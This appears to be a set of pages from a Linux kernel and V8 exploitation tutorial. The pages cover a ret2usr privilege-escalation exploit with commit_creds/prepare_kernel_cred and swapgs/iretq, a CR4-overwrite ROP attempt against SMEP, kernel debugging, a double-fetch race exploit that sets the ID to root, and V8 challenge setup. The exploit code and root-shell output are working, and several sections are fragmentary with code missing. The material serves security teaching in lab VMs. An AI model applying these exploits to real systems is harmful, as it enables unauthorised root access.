"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
// restore all the registers
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs
instruction). The RIP register is updated to point to get_shell
and pop a shell.
If we compile it statically and load it into the initramfs.cpio
, notice that our privileges are elevated!
$ gcc -static -o exploit exploit.c
[...]
$ ./run.sh
~ $ ./exploit
[*] Saving state
[+] Saved state
FD: 3
[*] Returned to userland
~ # id
uid=0(root) gid=0(root)
We have successfully exploited a ret2usr!
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a literal StackOverflow post, or another one.
GS - limited segmentation. The contents of the GS register are swapped one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs
enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
Defines where the stack is stored
Must be reverted back to the userland stack
RSP
Same as above, really
CS - Code Segment
Defines the memory location that instructions are stored in
Must point to our user space code
RFLAGS - various things
GS is changed back via the swapgs
instruction. All others are changed back via iretq
, the QWORD variant of the iret
family of intel instructions. The intent behind iretq
is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq
.
The final version
// gcc -static -o exploit exploit.c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
void get_shell(void){
puts("[*] Returned to userland");
system("/bin/sh");
}
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;
uint64_t user_rip = (uint64_t) get_shell;
void save_state(){
puts("[*] Saving state");
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[+] Saved state");
}
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
int main() {
save_state();
// communicate with the module
int fd = open("/dev/kernel_rop", O_RDWR);
printf("FD: %d\n", fd);
// overflow
uint64_t payload[7];
payload[6] = (uint64_t) escalate;
write(fd, payload, 0);
}
An old technique
Using the same setuo as ret2usr, we make one single modification in run.sh
:
#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-initrd initramfs.cpio \
-append "console=ttyS0 quiet loglevel=3 oops=panic nokaslr pti=off" \
-monitor /dev/null \
-nographic \
-no-reboot \
-smp cores=2 \
-cpu qemu64,+smep \ # add this line
-s
Now if we load the VM and run our exploit from last time, we get a kernel panic.
It's worth noting what it looks like for the future - especially these 3 lines:
[ 1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[ 1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.633781] #PF: supervisor instruction fetch in kernel mode
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val)
. This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms
(if we update init
to log us in as root
):
~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4
Ok, it's located at 0xffffffff8102b6d0
. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
[ 1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
CR4 is currently 0x00000000001006b0
. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0
.
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage
file into a vmlinux
ELF file so that we can run ropper
or ROPgadget
on it. To do this, we can run extract-vmlinux
, from the official Linux git repository.
$ ./extract-vmlinux bzImage > vmlinux
$ file vmlinux
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=3003c277e62b32aae3cfa84bb0d5775bd2941b14, stripped
$ ropper -f vmlinux --search "pop rdi"
0xffffffff811e08ec: pop rdi; ret;
All that changes in the exploit is the overflow:
// overflow
uint64_t payload[20];
int i = 6;
payload[i++] = 0xffffffff811e08ec; // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0; // native_write_cr4
payload[i++] = (uint64_t) escalate;
write(fd, payload, 0);
We can then compile it and run.
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
[ 1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[ 1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.547037] #PF: supervisor instruction fetch in kernel mode
SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4()
. What gives?
Well, if we look at the source, there's another feature:
void __no_profile native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;
set_register:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}
Essentially, it will check if the val
that we input disables any of the bits defined in cr4_pinned_bits
. This value is set on boot, and effectively stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.
A practical example
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5
). The offsets of commit_creds
and prepare_kernel_cred()
are as follows, and we'll update exploit.c
with the new values:
commit_creds 0xffffffff81077390
prepare_kernel_cred 0xffffffff81077510
Instead of an elevated shell, we get a kernel panic, with the following data dump:
[ 1.472064] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 1.472064] #PF: supervisor read access in kernel mode
[ 1.472064] #PF: error_code(0x0000) - not-present page
[ 1.472064] PGD 22d9067 P4D 22d9067 PUD 22da067 PMD 0
[ 1.472064] Oops: Oops: 0000 [#1] SMP
[ 1.472064] CPU: 0 PID: 32 Comm: exploit Tainted: G W O 6.10.0-rc5 #7
[ 1.472064] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[ 1.472064] RIP: 0010:commit_creds+0x29/0x180
[ 1.472064] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[ 1.472064] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[ 1.472064] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[ 1.472064] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[ 1.472064] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[ 1.472064] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[ 1.472064] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[ 1.472064] FS: 000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 1.472064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1.472064] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[ 1.472064] Call Trace:
[ 1.472064] <TASK>
[ 1.472064] ? show_regs+0x64/0x70
[ 1.472064] ? __die+0x24/0x70
[ 1.472064] ? page_fault_oops+0x14b/0x420
[ 1.472064] ? search_extable+0x2b/0x30
[ 1.472064] ? commit_creds+0x29/0x180
[ 1.472064] ? search_exception_tables+0x4f/0x60
[ 1.472064] ? fixup_exception+0x26/0x2d0
[ 1.472064] ? kernelmode_fixup_or_oops.constprop.0+0x58/0x70
[ 1.472064] ? __bad_area_nosemaphore+0x15d/0x220
[ 1.472064] ? find_vma+0x30/0x40
[ 1.472064] ? bad_area_nosemaphore+0x11/0x20
[ 1.472064] ? exc_page_fault+0x284/0x5c0
[ 1.472064] ? asm_exc_page_fault+0x2b/0x30
[ 1.472064] ? abort_creds+0x30/0x30
[ 1.472064] ? commit_creds+0x29/0x180
[ 1.472064] ? x64_sys_call+0x146c/0x1b10
[ 1.472064] ? do_syscall_64+0x50/0x110
[ 1.472064] ? entry_SYSCALL_64_after_hwframe+0x4b/0x53
[ 1.472064] </TASK>
[ 1.472064] Modules linked in: kernel_rop(O)
[ 1.472064] CR2: 0000000000000000
[ 1.480065] ---[ end trace 0000000000000000 ]---
[ 1.480065] RIP: 0010:commit_creds+0x29/0x180
[ 1.480065] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[ 1.484065] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[ 1.484065] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[ 1.484065] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[ 1.484065] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[ 1.484065] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[ 1.484065] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[ 1.484065] FS: 000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 1.484065] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1.484065] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[ 1.488065] Kernel panic - not syncing: Fatal exception
[ 1.488065] Kernel Offset: disabled
[ 1.488065] ---[ end Kernel panic - not syncing: Fatal exception ]---
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while trying to get the previous section working, so it happens to all of us!
One thing that we can notice is that, the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds()
:
[ 1.480065] RIP: 0010:commit_creds+0x29/0x180
We can check the source here, but chances are that the parameter passed to commit_creds()
is NULL - this appears to be the case, since RDI is shown to be 0
above!
In our run.sh
script, we now include the -s
flag. This flag opens up a GDB server on port 1234
, so we can connect to it and debug the kernel. Another useful flag is -S
, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit
binary just before the write()
call by using getchar()
, which will hang until we hit Enter
or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds()
is 0xffffffff81077390
, we can set a breakpoint there.
$ gdb kernel_rop.ko
pwndbg> target remote :1234
pwndbg> b *0xffffffff81077390
We then continue with c
and go back to the VM terminal, where we hit Enter
to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0
:
pwndbg> info reg rdi
rdi 0x0 0
This explains the NULL dereference. RAX is also 0
, in fact, so it's not a problem with the mov
:
pwndbg> info reg rax
rax 0x0 0
This means that prepare_kernel_cred()
is returning NULL
. Why is that? It didn't do that before!
Let's compare the differences in prepare_kernel_cred()
code between kernel version 6.1 and version 6.10:
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_kernel_cred() alloc %p", new);
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
validate_creds(old);
*new = *old;
new->non_rcu = 0;
atomic_long_set(&new->usage, 1);
set_cred_subscribers(new, 0);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);
// [...]
if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;
put_cred(old);
validate_creds(new);
return new;
error:
put_cred(new);
put_cred(old);
return NULL;
}
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
if (WARN_ON_ONCE(!daemon))
return NULL;
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_kernel_cred() alloc %p", new);
old = get_task_cred(daemon);
*new = *old;
new->non_rcu = 0;
atomic_long_set(&new->usage, 1);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);
// [...]
new->ucounts = get_ucounts(new->ucounts);
if (!new->ucounts)
goto error;
if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;
put_cred(old);
return new;
error:
put_cred(new);
put_cred(old);
return NULL;
}
The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task
:
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
i.e. if daemon
is NULL, use init_task
. On 6.10, the behaviour is altogether different:
if (WARN_ON_ONCE(!daemon))
return NULL;
If daemon
is NULL, return NULL - hence our issue!
Unfortunately, there's no way to bypass this easily! We can fake cred
structs, and if we can leak init_task
we can use that memory address as well, but it's no longer as simple as calling prepare_kernel_cred(0)
!
Heavily beta
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL)
we are dropped as root
.
To understand this, we have a talk a little about how privileges and credentials work in Linux.
The cred
struct contains all the permissions a task holds. The ones that we care about are typically these:
struct cred {
/* ... */
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
/* ... */
} __randomize_layout;
These fields are all unsigned int
fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
The kernel needs to store information about each running task, and to do this it uses the task_struct
structure. Each kernel task has its own instance.
struct task_struct {
/* ... */
/*
* Pointers to the (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->real_parent->pid)
*/
/* Real parent process: */
struct task_struct __rcu *real_parent;
/* Recipient of SIGCHLD, wait4() reports: */
struct task_struct __rcu *parent;
/*
* Children/sibling form the list of natural children:
*/
struct list_head children;
struct list_head sibling;
struct task_struct *group_leader;
/* ... */
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
/* ... */
};
The task_struct
instances are stored in a linked list, with a global kernel variable init_task
pointing to the first one. Each task_struct
then points to the next.
Along with linking data, the task_struct
also (more importantly) stores real_cred
and cred
, which are both pointers to a cred
struct. The difference between the two is explained here:
/*
* The security context of a task
*
* The parts of the context break down into two categories:
*
* (1) The objective context of a task. These parts are used when some other
* task is attempting to affect this one.
*
* (2) The subjective context. These details are used when the task is acting
* upon another object, be that a file, a task, a key or whatever.
*
* Note that some members of this structure belong to both categories - the
* LSM security pointer for instance.
*
* A task has two security pointers. task->real_cred points to the objective
* context that defines that task's actual details. The objective part of this
* context is used whenever that task is acted upon.
*
* task->cred points to the subjective context that defines the details of how
* that task is going to act upon another object. This may be overridden
* temporarily to point to another security context, but normally points to the
* same context as task->real_cred.
*/
In effect, cred
is the permission when we are trying to act on something, and real_cred
when something it trying to act on us. The majority of the time, both will point to the same structure, but a common exception is with setuid executables, which will modify cred
but not real_cred
.
So, which set of credentials do we want to target with an arbitrary write? Honestly, I'm not entirely sure - it feels as if we want to update cred
, as that will change our abilities to read and execute files. Despite that, I have seen writeups overwrite real_cred
, so perhaps I am wrong in that - though, again, they usually point to the same struct and therefore would have the same effect.
Once I work it out, I shall update this (TODO!).
As an alternative to overwriting cred
structs in the unpredictable kernel heap, we can call prepare_kernel_cred()
to generate a new valid cred
struct and commit_creds()
to overwrite the real_cred
and cred
of the current task_struct
.
The function can be found here, but there's not much to say - it creates a new cred
struct called new
then destroys the old
. It returns new
.
If NULL is passed as the argument, it will return a new set of credentials that match the init_task
credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0)
results in a new set of root creds!
This last part is actually not true on newer kernel versions - check out Debugging the Kernel Module section!
This function is found here, but ultimately it will update task->real_cred
and task->cred
to the new credentials:
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
TODO
$readelf -d source
Dynamic section at offset 0x2f14 contains 24 entries:
Tag Type Name/Value
0x00000005 (STRTAB) 0x804825c
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x80482d8
[...]
$readelf -r source
Relocation section '.rel.dyn' at offset 0x2d0 contains 1 entry:
Offset Info Type Sym.Value Sym. Name
0804bffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2d8 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
0804c00c 00000107 R_386_JUMP_SLOT 00000000 gets@GLIBC_2.0
0804c010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Word;
typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;
/* How to extract and insert information held in the r_info field. */
#define ELF32_R_SYM(val) ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)
typedef struct
{
Elf32_Word st_name ; /* Symbol name (string tbl index) */
Elf32_Addr st_value ; /* Symbol value */
Elf32_Word st_size ; /* Symbol size */
unsigned char st_info ; /* Symbol type and binding */
unsigned char st_other ; /* Symbol visibility under glibc>=2.2 */
Elf32_Section st_shndx ; /* Section index */
} Elf32_Sym ;
The most simple of vulnerabilities
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
Let's start with a convoluted example, where all we want to do is change the id
that the module stores. We are not allowed to set it to 0
, as that is the ID of root
, but all other values are allowed.
The code below will be the contents of the read()
function of a kernel. I've removed the boilerplate code mentioned previously, but here are the relevant parts:
#define PASSWORD "p4ssw0rd"
typedef struct {
int id;
char password[10];
} Credentials;
static int id = 1001;
static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
Credentials *creds = (Credentials *)buf;
printk(KERN_INFO "[Double-Fetch] Reading password from user...");
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
// to increase reliability
msleep(1000);
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
return -1;
}
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Compare the password to p4ssw0rd
If it is, it will set the id
variable to the id
in the creds
structure
Let's say we want to communicate with the module, and we set up a simple C program to do so:
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
int res_id = write(fd, &creds, 0); // last parameter here makes no difference
printf("New ID: %d\n", res_id);
return 0;
}
We compile this statically (as there are no shared libraries on our VM):
gcc -static -o exploit exploit.c
As expected, the id
variable gets set to 900
- we can check this in dmesg
:
$ dmesg
[...]
[ 3.104165] [Double-Fetch] Password correct! ID set to 900
That all works fine.
The flaw here is that creds->id
is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials
struct:
Credentials *creds = (Credentials *)buf;
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials
struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id
field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0
):
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
And once more, to set the id
variable:
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
Inbetween the two dereferences creds->id
, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id
in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900
), but by the time it is copied to id
, it will have become 0
and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id
.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id
!
// gcc -static -o exploit -pthread exploit.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *switcher(void *arg);
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
// communicate with the module
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
// use a random ID and set the password correctly
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
// set up the switcher thread
// pass it a pointer to `creds`, so it can modify it
pthread_t thread;
if (pthread_create(&thread, NULL, switcher, &creds)) {
fprintf(stderr, "Error creating thread\n");
return -1;
}
// now we write the cred struct to the module
// it should be swapped after about .3 seconds by switcher
int res_id = write(fd, &creds, 0);
// write returns the id we switched to
// if all goes well, that is 0
printf("New ID: %d\n", res_id);
// finish thread cleanly
if (pthread_join(thread, NULL)) {
fprintf(stderr, "Error joining thread\n");
return -1;
}
return 0;
}
void *switcher(void *arg) {
Credentials *creds = (Credentials *)arg;
// wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
sleep(0.3);
creds->id = 0;
}
We have to compile it statically, as the VM has no shared libraries.
$ gcc -static -o exploit -pthread exploit.c
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio
archive (you may want to do this in another folder):
$ cpio -i -F initramfs.cpio
Now copy exploit
there and make sure it's marked executable. You can then compress the filesystem again:
$ find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio
Use the newly-created initramfs.cpio
to lauch the VM with run.sh
. Executing exploit
, it is successful!
~ # ./exploit
FD: 3
New ID: 0
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being accessed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is a set of very specific functions.
For example, functions such as strcpy
or memcpy
do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user
and copy_to_user
, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow
acting as a guard against them.
This means that whether you interact using write
/read
or ioctl
, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user
was called (unless copy_from_user
is called on the same struct multiple times).
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also , so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.
Enabling SMAP is just as easy as SMEP:
Setting Up
Ok so first off, we're gonna need an old VM. Why? It's an old challenge with an old version of v8. Back then, the v8 version compilation steps required the python
command to point at python2
instead of python3
like on my ParrotOS VM, and there is the odd number of other steps. Long story short, there is a very real possibility for needing to jerry-rig a bunch of stuff, and I don't want to break a VM I actually use. Whoops.
So, we're gonna use a . You can get the ISO file directly from (amd64 version), and then set up a VM in VMware Workstation or your preferred virtualisation program.
Now we want to set up the system we're actually attacking. Instead of building v8 itself, we're going to build d8, the REPL (read–eval–print loop) for v8. It's essentially the command-line of v8, meaning we can compile less.
First off, install useful stuff.
Now let's grab the depot_tools
, which is needed for building v8, then add it to our PATH
:
Restart terminal for PATH
to update. Then in folder of choice (I am in ~/Desktop/oob-v8
), we fetch v8 and install all the dependencies needed to build it:
The next step is to checkout
the commit that the challenge is based on, then sync the local files to that:
Now we want to apply the diff
file we get given. The challenge archive can be found , and we'll extract it. The oob.diff
file defines the changes made to the source code since the commit we checked out, which includes the vulnerability.
Now let's apply it then prepare and build the release version:
But there is small problem when it gets run:
According to in NVIDIA, this is because in python 3.8+ lru_cache
has gotten a user_function
argument. We can try and update to python3.8, but the fear is that it will break something. Oh well! Let's try anyway.
Now we have Python 3.8 installed in /usr/bin/python3.8
, we can try and overwrite the symlink /usr/bin/python3
to point here instead of the default 3.6.9 version that came with the ISO.
Now we hope and pray that rerunning the ninja
command breaks nothing:
Ok, no ninja
. Let's follow and install it:
Then run it again:
And it starts working! The output release
version is found in v8/out.gn/x64.release/d8
. Now let's build debug.
And it's done. Epic!
I'm going to revert default Python to version 3.6 to minimise the possibility of something breaking.
I'm also going to install , the GDB extension. gef
is actively maintained, and also actually supports Ubuntu 18.04 (which pwndbg
, although that's due to requiring Python 3.8+ which we have technically set up in a roundabout way - use at your own risk!).
Now we can move on to the challenge itself.
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0)
:
Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds()
.
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0
, so we bypass the jne
in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne
and hit the ret
Recall that we need swapgs
and then iretq
. Both can be found easily.
The pop rbp; ret
is not important as iretq
jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS
, the reverse of the order they are pushed in.
If we try this now, we successfully escalate privileges!
The actual challenge
Let's first read the patch itself:
In essence, there is a new function ArrayOob
that is implemented. We can see it's added to the array object as a .oob()
method:
There's the odd bit of other stuff thrown around for getting it working, but the actual source of the challenge is (unsurprisingly) ArrayOob
itself (with a name like that, who would have thought?). Cleaned up a little, it looks like this:
Familiarity with the V8 codebase is unlikely, and even if you are familiar with it, it's unlikely you can read it like a native language.
It looks at the number of arguments the function takes, then stores it in len
If len
is greater than 2
, it throws an error (note that the first argument is always this
, so in reality it's just one).
It then gets the array in question, stored in array
array
is cast to a FixedDoubleArray
, an array of fixed size that stores doubles, called elements
The length of the array is stored in length
If there is no argument (len == 1
, i.e. only this
is passed) then elements[length]
is returned as a number
This is a clear Out-Of-Bounds (OOB) Read, as arrays in javascript are zero-indexed like most other programming languages
If an argument is given, elements[length]
is set to the value
that is the argument cast to a Number with Object::ToNumber
This is a clear Out-Of-Bounds (OOB) Write, for the same reason as above
So we have a very clear OOB vulnerability, allowing both a read and a write to one index further than the maximum length of the array. This begs an important question: what exists past the end of an array?
First, let's talk about data types in V8 and how they are represented.
V8 uses pointers, doubles and smis (standing for immediate small integers). Since it has to distinguish between these values, they are all stored in memory with slight differences.
A double is stored as its 64-bit binary representation (easy)
An smi is a 32-bit number, but it's stored as itself left-shifted by 32
so the bottom 32 bits are null
e.g. 0x12345678
is stored as 0x1234567800000000
A pointer to an address addr
is stored as addr | 1
, that is the least significant bit is set to 1
.
e.g. 0x12345678
is stored as 0x12345679
This helps differentiate it from an smi, but not from a double!
refers to pointers as HeapObjects as well.
Any output you get will always be in floating-point form; this is because V8 actually doesn't have a way to express 64-bit integers normally. We need a way to convert floating-point outputs to hexadecimal addresses (and vice versa!). To do this, we'll use the standard approach, which is as follows:
You'll see these functions in most V8 exploits. They essentially just convert between interpreting data as floating-point form or as integers.
We're going to throw this into a javascript file exploit.js
. If we want to use these functions, we can simply pass them to d8 in the command line:
The Map is an incredibly important V8 data structure, storing key information such as
